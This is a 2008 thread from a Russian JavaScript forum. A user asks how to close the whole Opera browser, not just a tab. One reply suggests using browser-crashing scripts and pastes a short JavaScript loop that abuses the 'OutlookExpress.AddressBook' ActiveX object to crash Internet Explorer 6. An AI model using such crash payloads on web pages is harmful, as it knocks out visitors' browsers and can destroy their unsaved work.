Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 28.07.2008, 10:59
Новичок на форуме
Отправить личное сообщение для Fillonik Посмотреть профиль Найти все сообщения от Fillonik
 
Регистрация: 28.07.2008
Сообщений: 1

Закрыть браузер (Опера)
Здравствуйте!
Есть ли возможность закрыть не вкладку, а весь браузер?
Интересует конкретно Опера, но буду рад любой информации.

Спасибо!
Ответить с цитированием
  #2 (permalink)  
Старый 28.07.2008, 11:17
Гость
 
Сообщений: n/a

конечно можно
это можно осуществить привязав к кнопке к какои нить скрипт
для закрыьтя оперы тебе надо поискать скрипты осуществляющие краш оперы


только учти в разных версиях фиксятса такие штуки
вот к примеру для осла 6 убивается
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").concat ('3'+'3'+'3');
}catch(e){}
}
</script>
<script>
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").join(1 ,1,1);
}catch(e){}
}
</script>

для оперы поищи {opera 9.51+crash}
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
iframe | закрыть если... Geek Events/DOM/Window 5 30.09.2008 16:23
как при открытии окна закрыть предыдущее Евдокимова Events/DOM/Window 3 16.09.2008 17:12
как проверить поддеружет браузер определенное событие? GOll Элементы интерфейса 9 24.07.2008 14:40